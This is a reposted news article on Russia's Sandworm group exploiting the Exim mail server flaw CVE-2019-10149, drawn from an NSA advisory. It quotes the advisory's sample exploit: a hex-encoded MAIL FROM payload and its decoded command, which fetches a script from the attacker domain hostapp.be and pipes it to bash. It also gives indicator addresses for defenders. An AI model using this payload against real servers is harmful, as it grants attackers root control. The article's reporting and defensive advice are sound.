viralamo

Menu
  • Technology
  • Science
  • Money
  • Culturs
  • Trending
  • Video

Subscribe To Our Website To Receive The Last Stories

Join Us Now For Free
Home
Technology
Russian hackers are exploiting bug that gives control of US servers
Technology

Russian hackers are exploiting bug that gives control of US servers

28/05/2020

Stylized photo of desktop computer.

A Russian hacking group tied to power-grid attacks in Ukraine, the world’s most destructive data wiper worm, and other nefarious Kremlin operations is exploiting a vulnerability that allows it to take control of computers operated by the US government and its partners.

In an advisory published on Thursday, the US National Security Agency said that the Sandworm group was actively exploiting a vulnerability in Exim, an open source mail transfer agent, or MTA, for Unix-based operating systems. Tracked as CVE-2019-10149, the critical bug makes it possible for an unauthenticated remote attacker to send specially crafted emails that execute commands with root privileges. With that, the attacker can install programs of their choosing, modify data, and create new accounts.

A patch CVE-2019-10149 has been available since last June. The attacks have been active since at least August. NSA officials wrote:

The actors exploited victims using Exim software on their public facing MTAs by sending a command in the “MAIL FROM” field of an SMTP (Simple Mail Transfer Protocol) message. Below is a sample, which contains parameters the actor would modify per deployment.

MAILFROM:<${run{x2Fbinx2Fshtctx22execx20x2Fusrx2Fbinx2Fwgetx20x2DOx20x2Dx20http:x2Fx2Fhostapp.bex2Fscript1.shx20x7C x20bashx22}}@hostapp.be>
Hex decoded command:
/bin/sh -c "exec /usr/bin/wget -O - http://hostapp.be/script1.sh | bash"

Figure 1: Sample “MAIL FROM” exploitation command

When CVE-2019-10149 is successfully exploited, an actor is able to execute code of their choosing. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain. This script would attempt to do the following on the victim machine: add privileged users disable network security settings update SSH configurations to enable additional remote access execute an additional script to enable follow-on exploitation.

Thursday’s advisory said the hackers worked for a specific unit, known as the Main Center for Special Technologies, that’s within the GRU, or Russia’s Main Intelligence Directorate. There is general agreement among security researchers that the hacking group working on behalf of this unit has been responsible for some of the most ambitious and destructive cyberattacks in recent years.

Examples include:

Wired journalist Andy Greenberg recently published Sandworm, a book that chronicles the hacks and the geopolitical tensions they exploit.

The Exim mail-server bug came to light last June, at the same time that developers published a security patch. The advisory said that remote attacks generally required that vulnerable systems no longer run with default settings. In one case, though, remote attacks were possible against default systems when an attacker kept a connection to the vulnerable server open for seven days by transmitting one byte every few minutes.

Thursday’s advisory didn’t say how many servers have been targeted successfully or the geographies or industries they’re in. Even so, the NSA typically doesn’t issue these kinds of warnings unless there’s reason for concern.

People responsible for Exim servers should check that they’re running version 4.92 or higher. And out of an abundance of caution, administrators should also check system logs for connections to 95.216.13.196, 103.94.157.5, and hostapp.be, which are all connected to the ongoing Sandworm campaign.

Source link

Share
Tweet
Pinterest
Linkedin
Stumble
Google+
Email
Prev Article
Next Article

Related Articles

New AI technique speeds up language models on edge devices
The metrics used to benchmark AI and machine learning models …

Researchers find ‘inconsistent’ benchmarking across 3,867 AI research papers

Beat Saber is now an Oculus studio after Facebook acquisition
TechCrunch ist Teil von Verizon Media. Klicken Sie auf ‘Ich …

Layoffs are disproportionately impacting startup satellite offices

Leave a Reply Cancel reply

Find us on Facebook

Related Posts

  • A Clubhouse bug let people lurk in rooms invisibly
    A Clubhouse bug let people lurk in …
    23/04/2021
  • Daye CEO: Most male investors couldn’t even say ‘tampon’ out loud
    Daye CEO: Most male investors couldn’t even …
    03/01/2020
  • LucidSound’s LS1 and LS10 headsets are solid and affordable
    LucidSound’s LS1 and LS10 headsets are solid …
    24/01/2020
  • Halo Infinite reveal pits the Master Chief against The Banished in an open world
    Halo Infinite reveal pits the Master Chief …
    24/07/2020
  • Spider-Man: Miles Morales review — A hero with heart gets the next gen swinging
    Spider-Man: Miles Morales review — A hero …
    07/11/2020

Popular Posts

  • 10 Movies That Totally Changed Course Midway …
    06/08/2022 0
  • Starlink unveils $5,000-a-month Internet for oil rigs and premium yachts
    Starlink unveils $5,000-a-month Internet for oil rigs …
    08/07/2022 0
  • 10 Thrilling Museum Heists That Haven’t Been …
    09/07/2022 0
  • 10 Movie Robots Who Would Pass the …
    09/07/2022 0
  • 10 Fascinating Things You Might Not Know …
    10/07/2022 0

viralamo

Pages

  • Contact Us
  • Privacy Policy
Copyright © 2022 viralamo
Theme by MyThemeShop.com

Ad Blocker Detected

Our website is made possible by displaying online advertisements to our visitors. Please consider supporting us by disabling your ad blocker.

Refresh